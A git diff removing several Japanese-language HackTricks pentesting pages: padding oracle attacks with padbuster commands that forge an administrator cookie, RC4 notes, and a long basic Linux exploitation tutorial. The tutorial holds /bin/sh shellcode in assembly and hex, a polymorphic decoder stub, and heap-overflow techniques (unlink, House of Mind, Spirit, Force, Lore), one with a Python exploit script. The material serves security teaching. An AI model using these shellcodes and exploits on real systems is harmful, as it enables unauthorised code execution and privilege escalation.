- 以前に初期化されたハッシュの状態を6036708eba0d11f6ef52ad44e8b74d5bに変更する
- 文字列「append」を追加する
- ハッシュを完了させ、その結果のハッシュは「secret」 + 「data」 + 「padding」 + 「append」の**有効なもの**になります
## **ツール**
{{#ref}}
https://github.com/iagox86/hash_extender
{{#endref}}
## 参考文献
この攻撃については、[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)でよく説明されています。
{{#include ../banners/hacktricks-training.md}}

102
src/cryptography/padding-oracle-priv.md
View File

@ -1,102 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
<figure><img src="/..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
# CBC - シファーブロックチェーン
CBCモードでは、**前の暗号化ブロックがIVとして使用され**、次のブロックとXORされます
![https://defuse.ca/images/cbc_encryption.png](https://defuse.ca/images/cbc_encryption.png)
CBCを復号するには、**逆の** **操作**が行われます:
![https://defuse.ca/images/cbc_decryption.png](https://defuse.ca/images/cbc_decryption.png)
**暗号化** **キー**と**IV**を使用する必要があることに注意してください。
# メッセージパディング
暗号化は**固定** **サイズ** **ブロック**で行われるため、**最後の** **ブロック**の長さを完成させるために**パディング**が通常必要です。\
通常、**PKCS7**が使用され、ブロックを完成させるために**必要なバイト数**を**繰り返す**パディングが生成されます。たとえば、最後のブロックが3バイト不足している場合、パディングは`\x03\x03\x03`になります。
**8バイトの長さの2つのブロック**の例を見てみましょう:
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 |
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** |
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
最後の例では、**最後のブロックが満杯だったため、パディングだけの別のブロックが生成されました**。
# パディングオラクル
アプリケーションが暗号化されたデータを復号するとき、最初にデータを復号し、その後パディングを削除します。パディングのクリーンアップ中に、**無効なパディングが検出可能な動作を引き起こす**場合、**パディングオラクルの脆弱性**があります。検出可能な動作は、**エラー**、**結果の欠如**、または**応答の遅延**である可能性があります。
この動作を検出した場合、**暗号化されたデータを復号**し、さらには**任意の平文を暗号化**することができます。
## どのように悪用するか
この種の脆弱性を悪用するには、[https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster)を使用するか、単に行うことができます。
```
sudo apt-get install padbuster
```
サイトのクッキーが脆弱かどうかをテストするために、次のことを試すことができます:
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
```
**エンコーディング 0** は **base64** が使用されていることを意味します(他のオプションも利用可能ですので、ヘルプメニューを確認してください)。
この脆弱性を**悪用して新しいデータを暗号化することもできます。例えば、クッキーの内容が "**_**user=MyUsername**_**" の場合、これを "\_user=administrator\_" に変更してアプリケーション内で権限を昇格させることができます。また、`paduster`を使用して -plaintext** パラメータを指定することでも可能です。
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
```
サイトが脆弱な場合、`padbuster`は自動的にパディングエラーが発生するタイミングを見つけようとしますが、**-error**パラメータを使用してエラーメッセージを指定することもできます。
```bash
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
```
## 理論
**要約**すると、すべての**異なるパディング**を作成するために使用できる正しい値を推測することで、暗号化されたデータの復号を開始できます。次に、パディングオラクル攻撃が始まり、1、2、3などのパディングを**作成する**正しい値を推測しながら、最後から最初へバイトを復号します。
![](<../images/image (629) (1) (1).png>)
暗号化されたテキストが**2ブロック**を占めていると想像してください。これは**E0からE15**のバイトで構成されています。\
**最後の** **ブロック****E8**から**E15**)を**復号**するために、全ブロックが「ブロック暗号復号」を通過し、**中間バイトI0からI15**を生成します。\
最後に、各中間バイトは前の暗号化されたバイトE0からE7と**XOR**されます。したがって:
- `C15 = D(E15) ^ E7 = I15 ^ E7`
- `C14 = I14 ^ E6`
- `C13 = I13 ^ E5`
- `C12 = I12 ^ E4`
- ...
今、`C15``0x01`に**変更する**ことが可能であり、これも正しいパディングになります。したがって、この場合:`\x01 = I15 ^ E'7`
したがって、E'7を見つけることで、**I15を計算する**ことができます:`I15 = 0x01 ^ E'7`
これにより、**C15を計算する**ことができます:`C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
**C15**を知っているので、今度は**C14を計算する**ことが可能ですが、今回はパディング`\x02\x02`をブルートフォースします。
このBFは前のものと同じくらい複雑で、値が0x02の`E''15`を計算することが可能です:`E''7 = \x02 ^ I15`。したがって、**`C14``0x02`に等しい**ように生成する**`E'14`**を見つけるだけです。\
次に、C14を復号するために同じ手順を実行します**`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**このチェーンをたどって、暗号化されたテキスト全体を復号します。**
## 脆弱性の検出
アカウントを登録し、このアカウントでログインします。\
もし**何度もログイン**して、常に**同じクッキー**を受け取る場合、アプリケーションに**何か****問題**がある可能性があります。**送信されるクッキーは、ログインするたびにユニークであるべきです**。クッキーが**常に**同じであれば、おそらく常に有効であり、それを無効にする方法は**ありません**。
今、**クッキーを変更**しようとすると、アプリケーションから**エラー**が返されることがわかります。\
しかし、パディングをブルートフォース例えばpadbusterを使用すると、別のユーザーに対して有効な別のクッキーを取得することができます。このシナリオは、padbusterに対して脆弱である可能性が非常に高いです。
## 参考文献
- [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)
<figure><img src="/..https:/pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{{#include ../banners/hacktricks-training.md}}

15
src/cryptography/rc4-encrypt-and-decrypt.md
View File

@ -1,15 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
もしRC4を使用してプレーンテキストを暗号化できれば、同じパスワードを使用してそのRC4によって暗号化された任意のコンテンツを暗号化関数を使って復号化できます。
既知のプレーンテキストを暗号化できれば、パスワードを抽出することも可能です。詳細なリファレンスはHTB Kryptosマシンで見つけることができます
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

9
src/emails-vulns.md
View File

@ -1,9 +0,0 @@
# メールの脆弱性
{{#include ./banners/hacktricks-training.md}}
##
##
{{#include ./banners/hacktricks-training.md}}

542
src/exploiting/linux-exploiting-basic-esp/README.md
View File

@ -1,542 +0,0 @@
# Linux Exploiting (Basic) (SPA)
{{#include ../../banners/hacktricks-training.md}}
## **2.SHELLCODE**
カーネルの割り込みを表示する: cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep “\_\_NR\_”
setreuid(0,0); // \_\_NR_setreuid 70\
execve(“/bin/sh”, args\[], NULL); // \_\_NR_execve 11\
exit(0); // \_\_NR_exit 1
xor eax, eax ; eaxをクリア\
xor ebx, ebx ; ebx = 0 なので引数はなし\
mov al, 0x01 ; eax = 1 —> \_\_NR_exit 1\
int 0x80 ; システムコールを実行
**nasm -f elf assembly.asm** —> .oファイルを返す\
**ld assembly.o -o shellcodeout** —> アセンブリコードから形成された実行可能ファイルを得て、**objdump**でオペコードを取得できる\
**objdump -d -Mintel ./shellcodeout** —> 実際に私たちのシェルコードであることを確認し、オペコードを取得する
**シェルコードが機能することを確認する**
```
char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80”
void main(){
void (*fp) (void);
fp = (void *)shellcode;
fp();
}<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
```
システムコールが正しく行われているか確認するには、前のプログラムをコンパイルし、システムコールが**strace ./PROGRAMA_COMPILADO**に表示される必要があります。
シェルコードを作成する際にトリックを行うことができます。最初の命令はcallへのジャンプです。callは元のコードを呼び出し、さらにEIPをスタックに入れます。call命令の後に必要な文字列を入れているため、そのEIPを使って文字列を指し示し、さらにコードの実行を続けることができます。
EJ **トリック (/bin/sh)**:
```
jmp 0x1f ; Salto al último call
popl %esi ; Guardamos en ese la dirección al string
movl %esi, 0x8(%esi) ; Concatenar dos veces el string (en este caso /bin/sh)
xorl %eax, %eax ; eax = NULL
movb %eax, 0x7(%esi) ; Ponemos un NULL al final del primer /bin/sh
movl %eax, 0xc(%esi) ; Ponemos un NULL al final del segundo /bin/sh
movl $0xb, %eax ; Syscall 11
movl %esi, %ebx ; arg1=“/bin/sh”
leal 0x8(%esi), %ecx ; arg[2] = {“/bin/sh”, “0”}
leal 0xc(%esi), %edx ; arg3 = NULL
int $0x80 ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL)
xorl %ebx, %ebx ; ebx = NULL
movl %ebx, %eax
inc %eax ; Syscall 1
int $0x80 ; exit(0)
call -0x24 ; Salto a la primera instrución
.string \”/bin/sh\” ; String a usar<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1"></span>
```
**EJを使用したスタック(/bin/sh):**
```
section .text
global _start
_start:
xor eax, eax ;Limpieza
mov al, 0x46 ; Syscall 70
xor ebx, ebx ; arg1 = 0
xor ecx, ecx ; arg2 = 0
int 0x80 ; setreuid(0,0)
xor eax, eax ; eax = 0
push eax ; “\0”
push dword 0x68732f2f ; “//sh”
push dword 0x6e69622f; “/bin”
mov ebx, esp ; arg1 = “/bin//sh\0”
push eax ; Null -> args[1]
push ebx ; “/bin/sh\0” -> args[0]
mov ecx, esp ; arg2 = args[]
mov al, 0x0b ; Syscall 11
int 0x80 ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL)
```
**EJ FNSTENV:**
```
fabs
fnstenv [esp-0x0c]
pop eax ; Guarda el EIP en el que se ejecutó fabs
```
**Egg Huter:**
小さなコードで、プロセスに関連付けられたメモリページを走査し、そこに保存されたシェルコードを探します(シェルコードに置かれた署名を探します)。コードを注入するための小さなスペースしかない場合に便利です。
**Shellcodes polimórficos**
暗号化されたシェルで構成されており、それを復号化してジャンプする小さなコードを持っています。Call-Popのトリックを使用して、これは**暗号化されたシーザーの例**です:
```
global _start
_start:
jmp short magic
init:
pop esi
xor ecx, ecx
mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá)
desc:
sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar)
sub cl, 1
jnz desc
jmp short sc
magic:
call init
sc:
;Aquí va el shellcode
```
## **5.補完的手法**
**Murat技術**
Linuxではすべてのプログラムは0xbfffffffからマッピングされます。
Linuxで新しいプロセスのスタックがどのように構築されるかを見ることで、プログラムがシェルコードだけを持つ環境で起動されるようにエクスプロイトを開発できます。このアドレスは次のように計算できます: addr = 0xbfffffff - 4 - strlen(完全な実行可能ファイル名) - strlen(shellcode)
このようにして、シェルコードを持つ環境変数のアドレスを簡単に取得できます。
これは、execle関数が必要な環境変数だけを持つ環境を作成できるため可能です。
##
###
###
###
###
### **フォーマット文字列によるバッファオーバーフロー**
**sprintf**はフォーマットされた文字列を**変数に移動**します。したがって、文字列の**フォーマット**を悪用して、内容がコピーされる**変数でバッファオーバーフローを引き起こす**ことができます。\
例えば、ペイロード`%.44xAAAA`は**変数に44B+"AAAA"を書き込み**、これがバッファオーバーフローを引き起こす可能性があります。
### **\_\_atexit構造体**
> [!CAUTION]
> 現在、これをエクスプロイトするのは非常に**奇妙です**。
**`atexit()`**は、**他の関数がパラメータとして渡される**関数です。これらの**関数**は、**`exit()`**を実行するか、**main**の**戻り**時に**実行されます**。\
これらの**関数**のいずれかの**アドレス**をシェルコードを指すように**変更**できれば、**プロセスの制御を得る**ことができますが、これは現在より複雑です。\
現在、実行される**関数のアドレス**は、いくつかの構造の背後に**隠されており**、最終的に指すアドレスは関数のアドレスではなく、**XORで暗号化され**、**ランダムキー**でオフセットされています。したがって、現在この攻撃ベクターは**x86**および**x64_86**ではあまり役に立ちません。\
**暗号化関数**は**`PTR_MANGLE`**です。**m68k、mips32、mips64、aarch64、arm、hppa**などの**他のアーキテクチャ**は、**暗号化**関数を実装していません。なぜなら、それは**入力として受け取ったものと同じ**を返すからです。したがって、これらのアーキテクチャはこのベクターで攻撃可能です。
### **setjmp() & longjmp()**
> [!CAUTION]
> 現在、これをエクスプロイトするのは非常に**奇妙です**。
**`setjmp()`**は**コンテキスト**(レジスタ)を**保存**します。\
**`longjmp()`**は**コンテキスト**を**復元**します。\
**保存されたレジスタ**は: `EBX, ESI, EDI, ESP, EIP, EBP`\
EIPとESPは**`PTR_MANGLE`**関数によって渡されるため、この攻撃に対して脆弱な**アーキテクチャは上記と同じ**です。\
エラー回復や割り込みに役立ちます。\
ただし、私が読んだところによると、他のレジスタは保護されていないため、**関数内で`call ebx``call esi`、または`call edi`**がある場合、制御を奪うことができます。また、EBPを変更してESPを変更することもできます。
**C++におけるVTableとVPTR**
各クラスには**Vtable**があり、これは**メソッドへのポインタの配列**です。
各**クラス**のオブジェクトには**VPtr**があり、これはそのクラスの配列への**ポインタ**です。VPtrは各オブジェクトのヘッダーの一部であるため、**VPtrの上書き**が成功すれば、ダミーメソッドを指すように**変更**でき、関数を実行するとシェルコードに飛ぶことになります。
## **予防措置と回避策**
###
**Libsafeの置き換え**
次のようにアクティブ化されます: LD_PRELOAD=/lib/libsafe.so.2\
または\
“/lib/libsave.so.2” > /etc/ld.so.preload
不安全な関数への呼び出しを安全なものに置き換えます。標準化されていません。x86専用、-fomit-frame-pointerでコンパイルされたものには適用されず、静的コンパイルには適用されず、すべての脆弱な関数が安全になるわけではなく、LD_PRELOADはsuidバイナリでは機能しません
**ASCIIアーマードアドレス空間**
0x00000000から0x00ffffffまでの共有ライブラリを読み込むことで、常にバイト0x00が存在するようにします。しかし、これは実際にはほとんどの攻撃を防ぐことはできず、特にリトルエンディアンでは効果が薄いです。
**ret2plt**
ROPを実行して、strcpy@pltpltの関数を呼び出し、GOTのエントリを指し、呼び出したい関数の最初のバイトをコピーしますsystem()。次に、GOT+1を指してsystem()の2バイト目をコピーします…最終的にGOTに保存されたアドレスを呼び出すことになります。
**chroot()によるサンドボックス**
debootstrap -arch=i386 hardy /home/user —> 特定のサブディレクトリに基本システムをインストールします。
管理者は次のようにしてこれらのサンドボックスから出ることができます: mkdir foo; chroot foo; cd ..
**コードのインストゥルメンテーション**
Valgrind —> エラーを探します。\
Memcheck\
RAD (Return Address Defender)\
Insure++
## **8 ヒープオーバーフロー: 基本的なエクスプロイト**
**割り当てられたチャンク**
prev_size |\
size | —ヘッダー\
\*mem | データ
**空きチャンク**
prev_size |\
size |\
\*fd | 前方チャンクへのポインタ\
\*bk | 後方チャンクへのポインタ —ヘッダー\
\*mem | データ
空きチャンクは双方向リストbinにあり、2つの空きチャンクが隣接することはありません結合されます
“size”には次のビットが含まれています: 前のチャンクが使用中かどうか、チャンクがmmap()によって割り当てられたかどうか、チャンクがプライマリアリーナに属するかどうか。
チャンクを解放する際に、隣接するチャンクのいずれかが空いている場合、これらはunlink()マクロを介して結合され、新しい大きなチャンクがfrontlink()に渡されて適切なbinに挿入されます。
unlink(){\
BK = P->bk; —> 新しいチャンクのBKは、以前に空いていたチャンクのBKです。\
FD = P->fd; —> 新しいチャンクのFDは、以前に空いていたチャンクのFDです。\
FD->bk = BK; —> 次のチャンクのBKは新しいチャンクを指します。\
BK->fd = FD; —> 前のチャンクのFDは新しいチャンクを指します。\
}
したがって、P->bkをシェルコードのアドレスに、P->fdをGOTまたはDTORSのエントリのアドレス-12に変更できれば、次のようになります:
BK = P->bk = \&shellcode\
FD = P->fd = &\_\_dtor_end\_\_ - 12\
FD->bk = BK -> \*((&\_\_dtor_end\_\_ - 12) + 12) = \&shellcode
これにより、プログラム終了時にシェルコードが実行されます。
さらに、unlink()の4番目の文は何かを書き込み、シェルコードはこれに合わせて修正される必要があります:
BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor_end\_\_ - 12) —> これはシェルコードの8バイト目から4バイトを書き込むため、シェルコードの最初の命令はこれをスキップして残りのシェルコードに飛ぶためのjmpである必要があります。
したがって、エクスプロイトは次のように作成されます:
buffer1にシェルコードを入れ、最初にjmpを入れてnopsまたは残りのシェルコードに飛ぶようにします。
シェルコードの後に、次のチャンクのprev_sizeとsizeフィールドに到達するまでパディングを入れます。これらの場所に0xfffffff0を入れprev_sizeが空いていることを示すビットを持つように上書きされる、sizeに“-4”0xfffffffcを入れます3番目のチャンクで2番目が実際に空いているかどうかを確認する際に、変更されたprev_sizeに行くようにします-> これにより、free()が調査すると、3番目のsizeに行きますが、実際には2番目-4に行き、2番目のチャンクが空いていると考えます。そして、**unlink()**を呼び出します。
unlink()を呼び出すと、P->fdとして2番目のチャンクの最初のデータを使用するため、そこに上書きしたいアドレス-12FD->bkに12を加算しますを入れます。そして、そのアドレスに2番目のチャンクで見つけた2番目のアドレスを入れます。これはシェルコードへのアドレスであることが望ましいです偽のP->bk
**from struct import \***
**import os**
**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12バイトのパディング**
**shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \\**
**"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \\**
**"\x80\xe8\xdc\xff\xff\xff/bin/sh";**
**prev_size = pack("\<I”, 0xfffffff0) #前のチャンクが空いているビットが1であることが重要です**
**fake_size = pack("\<I”, 0xfffffffc) #-4、3番目のチャンクのsizeが4バイト後ろにあると考えさせるためprev_sizeを指す**
**addr_sc = pack("\<I", 0x0804a008 + 8) #ペイロードの最初に8バイトのパディングを入れます**
**got_free = pack("\<I", 0x08048300 - 12) #free()のアドレスをplt-12にシェルコードを実行するために上書きされるアドレス**
**payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) #ペイロードは最初に8バイトのパディングから始まります**
**payload += prev_size + fake_size + got_free + addr_sc #2番目のチャンクを変更し、got_freeはaddr_sc + 12のアドレスを保存するように指します**
**os.system("./8.3.o " + payload)**
**unset() 逆順で解放wargame**
3つの連続したチャンクを制御しており、予約された順序とは逆に解放されます。
その場合:
チャンクcにシェルコードを置きます。
チャンクaを使用してbを上書きし、sizeがPREV_INUSEビットをオフにして、チャンクaが空いていると考えさせます。
さらに、bのヘッダーのsizeを-4に上書きします。
これにより、プログラムは「a」が空いていると考え、binに入るため、unlink()を呼び出します。しかし、PREV_SIZEヘッダーが-4であるため、実際にはb+4から始まるチャンクだと考えます。つまり、b+4から始まるチャンクにunlink()を行い、b+12にfdポインタがあり、b+16にbkポインタがあります。
このようにして、bkにシェルコードのアドレスを、fdにputs()のアドレス-12を置くことで、ペイロードを得ることができます。
**フロントリンク技術**
何かを解放するときに、隣接するチャンクが空いていない場合にフロントリンクと呼ばれ、unlink()ではなく直接frontlink()が呼び出されます。
mallocが攻撃されるときに決して解放されない場合に有用な脆弱性です。
必要なもの:
データ入力関数でオーバーフローできるバッファ
これに隣接する解放されるべきバッファで、前のバッファのオーバーフローによってヘッダーのfdフィールドが変更されます。
サイズが512より大きいが前のバッファより小さいバッファ
この3番目のバッファのprev_sizeを上書きできるように、前に宣言されたバッファ
このようにして、2つのmallocを制御不能に上書きし、1つを制御可能に解放することで、エクスプロイトを作成できます。
**double free()脆弱性**
同じポインタでfree()を2回呼び出すと、2つのbinが同じアドレスを指します。
1つを再利用しようとすると、問題なく割り当てられます。別のものを使用しようとすると、同じスペースが割り当てられるため、ポインタ「fd」と「bk」が前の予約によって書き込まれるデータで偽装されます。
**free()後**
以前に解放されたポインタが再び制御なしで使用されます。
## **8 ヒープオーバーフロー: 高度なエクスプロイト**
unlink()とFrontLink()の技術は、unlink()関数を変更することで削除されました。
**The house of mind**
任意のコードを実行するには、free()を1回呼び出すだけで済みます。前のチャンクによってオーバーフローされ、解放される可能性のある2番目のチャンクを探すことが重要です。
free()の呼び出しはpublic_fREe(mem)を呼び出し、これを行います:
mstate ar_ptr;
mchunkptr p;
p = mem2chunk(mem); —> チャンクが始まるアドレスへのポインタを返しますmem-8
ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:\&main_arena \[1]
\_int_free(ar_ptr, mem);
}
\[1]では、sizeフィールドのNON_MAIN_ARENAビットを確認し、このビットを変更してtrueを返すようにし、heap_for_ptr()を実行します。これにより、memに対してandを適用し、最も重要でない2.5バイトを0にしますこの場合、0x0804a000から0x08000000になりますそして、0x08000000->ar_ptrにアクセスしますheap_info構造体のように
このようにして、例えば0x0804a000でチャンクを制御でき、**0x081002a0**でチャンクが解放されると、0x08100000に到達し、任意のものを書き込むことができます。例えば**0x0804a000**。この2番目のチャンクが解放されると、heap_for_ptr(ptr)->ar_ptrは0x08100000に書き込んだものを返しますなぜなら、前述のandが0x081002a0に適用され、最初の4バイトの値が得られるからです
このようにして、\_int_free(ar_ptr, mem)が呼び出されます。つまり、**\_int_free(0x0804a000, 0x081002a0)**\
**\_int_free(mstate av, Void_t\* mem){**\
…\
bck = unsorted_chunks(av);\
fwd = bck->fd;\
p->bk = bck;\
p->fd = fwd;\
bck->fd = p;\
fwd->bk = p;
..}
前述のように、avの値を制御できることがわかります。これは、解放されるチャンクに書き込んだものです。
unsorted_chunksが定義されているように、次のことがわかります:\
bck = \&av->bins\[2]-8;\
fwd = bck->fd = \*(av->bins\[2]);\
fwd->bk = \*(av->bins\[2] + 12) = p;
したがって、av->bins\[2]に\_\_DTOR_END\_\_-12の値を書き込むと、最後の命令で\_\_DTOR_END\_\_に2番目のチャンクのアドレスが書き込まれます。
つまり、最初のチャンクの先頭に\_\_DTOR_END\_\_-12のアドレスを何度も入れる必要があります。なぜなら、av->bins\[2]がそこから取得するからです。
2番目のチャンクのアドレスに最後の5つのゼロがある場合、最初のチャンクのアドレスを書き込む必要があります。これにより、heap_for_ptr()はar_ptrが最初のチャンクの先頭にあると考え、av->bins\[2]をそこから取得します。
2番目のチャンクでは、最初のチャンクのprev_sizeを0x0cに、sizeを何かに変更して-> NON_MAIN_ARENAを有効にします。
次に、チャンク2にnopsの山を置き、最後にシェルコードを置きます。
このようにして、\_int_free(TROZO1, TROZO2)が呼び出され、次にTROZO2のprev_sizeのアドレスが\_\_DTOR_END\_\_に書き込まれ、シェルコードに飛びます。
この技術を適用するには、ペイロードを少し複雑にするためにいくつかの要件を満たす必要があります。
この技術は、unlinkに対してほぼ同じパッチが適用されたため、もはや適用できません。新しいポインタが自分自身を指しているかどうかを比較します。
**Fastbin**
これはThe house of mindのバリエーションです。
次のコードを実行するために必要です。これは、\_int_free()関数の最初のチェックを通過した後に到達します。
fb = &(av->fastbins\[fastbin_index(size)] —> fastbin_index(sz) —> (sz >> 3) - 2
p->fd = \*fb
\*fb = p
このようにして、fbに関数のアドレスを置くと、そのアドレスに上書きされたチャンクのアドレスが置かれます。これには、アリーナがdtorsのアドレスに近い必要があります。より正確には、av->max_fastが上書きされるアドレスにある必要があります。
The House of Mindで、avの位置を制御できることがわかりました。
したがって、sizeフィールドに8 + NON_MAIN_ARENA + PREV_INUSEのサイズを置くと、fastbin_index()はfastbins\[-1]を返し、av->max_fastを指します。
この場合、av->max_fastは上書きされるアドレスになります指すのではなく、その位置が上書きされます
さらに、解放されたチャンクの隣接チャンクは8より大きくなければなりません。-> 先ほど解放されたチャンクのサイズが8であるため、この偽のチャンクには8より大きなサイズを置くだけで済みますシェルコードが解放されたチャンクに入るため、最初にnopsに飛ぶjmpを置く必要があります
さらに、この偽のチャンクはav->system_memより小さくなければなりません。av->system_memは1848バイト先にあります。
\_\_DTOR_END\_のゼロとGOTの少ないアドレスのため、これらのセクションのアドレスは上書きするのに適していないため、スタックを攻撃するためにfastbinを適用する方法を見てみましょう。
別の攻撃方法は、**av**をスタックにリダイレクトすることです。
sizeを8ではなく16に変更すると、fastbin_index()はfastbins\[0]を返し、これを使用してスタックを上書きできます。
これには、canaryやスタック内の奇妙な値がない必要があります。実際、次のような状態でなければなりません: 4バイトのゼロ + EBP + RET
4バイトのゼロは、**av**がこのアドレスにある必要があり、**av**の最初の要素は0である必要があります。
**av->max_fast**はEBPになり、制約を回避するための値になります。
**av->fastbins\[0]**は**p**のアドレスで上書きされ、RETになります。これにより、シェルコードに飛びます。
さらに、**av->system_mem**スタックの位置から1484バイト上には、チェックを回避するのに十分なゴミが含まれます。
さらに、解放されたチャンクの隣接チャンクは8より大きくなければなりません。-> 解放されたチャンクのサイズが16であるため、この偽のチャンクには8より大きなサイズを置くだけで済みますシェルコードが解放されたチャンクに入るため、最初にnopsに飛ぶjmpを置く必要があります
**The House of Spirit**
この場合、攻撃者によって変更可能なmallocへのポインタを持つことを目指します例えば、ポインタがスタックの変数へのオーバーフローの下にある場合
このようにして、このポインタを任意の場所に指すようにできます。しかし、どの場所も有効ではなく、偽のチャンクのサイズはav->max_fastより小さく、具体的には将来のmalloc()呼び出しで要求されるサイズ+8と等しくなければなりません。したがって、この脆弱なポインタの後にmalloc(40)が呼び出されることがわかっている場合、偽のチャンクのサイズは48でなければなりません。
例えば、プログラムがユーザーに数値を尋ねる場合、48を入力してmallocの変更可能なポインタを次の4バイト運が良ければEBPに属する可能性があるに指すことができます。こうすることで、48は後ろに残り、サイズヘッダーのように見えます。さらに、ptr-4+48のアドレスは複数の条件を満たす必要がありますこの場合、ptr=EBP。つまり、8 < ptr-4+48 < av->system_mem。
これが満たされると、次のmallocがmalloc(40)と呼ばれるとき、EBPのアドレスが割り当てられます。攻撃者がこのmallocに書き込むことができる場合、EBPとEIPの両方を任意のアドレスに上書きできます。
これは、free()が解放する際に、スタックのEBPを指すアドレスに新しいmalloc()のための完璧なサイズのチャンクがあることを記録するためだと思います。したがって、そのアドレスが割り当てられます。
**The House of Force**
必要なもの:
- wildernessを上書きできるチャンクへのオーバーフロー
- ユーザーによって定義されたサイズでmalloc()を呼び出す
- ユーザーによって定義されたデータを持つmalloc()の呼び出し
最初に、wildernessのチャンクのサイズを非常に大きな値0xffffffffで上書きします。これにより、十分に大きなメモリ要求は\_int_malloc()で処理され、ヒープを拡張する必要がなくなります。
次に、av->topを攻撃者の制御下にあるメモリ領域スタックなどを指すように変更します。av->topには\&EIP - 8が置かれます。
av->topを攻撃者の制御下にあるメモリ領域を指すように上書きする必要があります:
victim = av->top;
remainder = chunck_at_offset(victim, nb);
av->top = remainder;
Victimは現在のwildernessチャンクのアドレスの値現在のav->topを取得し、remainderはそのアドレスにmalloc()によって要求されたバイト数を加えたものです。したがって、\&EIP-8が0xbffff224にあり、av->topが0x080c2788を含む場合、次のmalloc()のためにav->topが$EIP-8を指すようにするために、制御されたmallocで予約する必要がある量は次のようになります:
0xbffff224 - 0x080c2788 = 3086207644。
このようにして、av->topに変更された値が保存され、次のmallocはEIPを指し、上書きできるようになります。
新しいwildernessチャンクのサイズが、最後のmalloc()によって行われた要求よりも大きいことが重要です。つまり、wildernessが\&EIP-8を指している場合、サイズはスタックのEBPフィールドに正確に配置されます。
**The House of Lore**
**SmallBinの破損**
解放されたチャンクは、そのサイズに基づいてbinに挿入されます。しかし、挿入される前にunsorted binsに保存されます。チャンクが解放されると、すぐにそのbinに入るのではなく、unsorted binsに留まります。次に、新しいチャンクが予約され、以前に解放されたものが役立つ場合、それを返しますが、より大きなものが予約されると、unsorted binsにある解放されたチャンクは適切なbinに入れられます。
脆弱なコードに到達するためには、メモリ要求がav->max_fast通常72より大きく、MIN_LARGE_SIZE512より小さくなければなりません。
binに要求されるサイズに適したチャンクがある場合、それは解放された後に返されます:
bck = victim->bk; 前のチャンクを指し、変更できる唯一の情報です。
bin->bk = bck; 前のチャンクが最後のチャンクになります。bckがスタックを指している場合、次に予約されるチャンクにこのアドレスが与えられます。
bck->fd = bin; このリストを閉じて、これがbinを指すようにします。
必要なもの:
2つのmallocを予約し、最初のものが解放された後にオーバーフローできるようにし、2番目のチャンクが解放されてそのbinに入るようにしますつまり、2番目のチャンクよりも大きなmallocを予約してからオーバーフローを行います
攻撃者が選択したアドレスに割り当てられるmallocは、攻撃者によって制御される必要があります。
目的は次のとおりです。解放されたヒープの下にあるチャンクにオーバーフローでき、binにある場合、bkポインタを変更できます。bkポインタを変更し、このチャンクがリストの最初になると、mallocがこのチャンクの次のチャンクが偽のアドレスにあると考えますスタックやGOTなど。したがって、別のチャンクが再度予約され、攻撃者がその権限を持っている場合、希望する位置にチャンクが与えられ、そこに書き込むことができます。
変更されたチャンクを解放した後は、解放されたものよりも大きなチャンクを予約する必要があります。これにより、変更されたチャンクはunsorted binsから出て、適切なbinに入ります。
binに入ったら、オーバーフローによってbkポインタを変更して、上書きしたいアドレスを指すようにします。
このようにして、binはmalloc()が十分に呼び出されるのを待つ必要があります。これにより、変更されたbinが再度使用され、次のチャンクが偽のアドレスにあると考えられます。そして、次に必要なチャンクが提供されます。
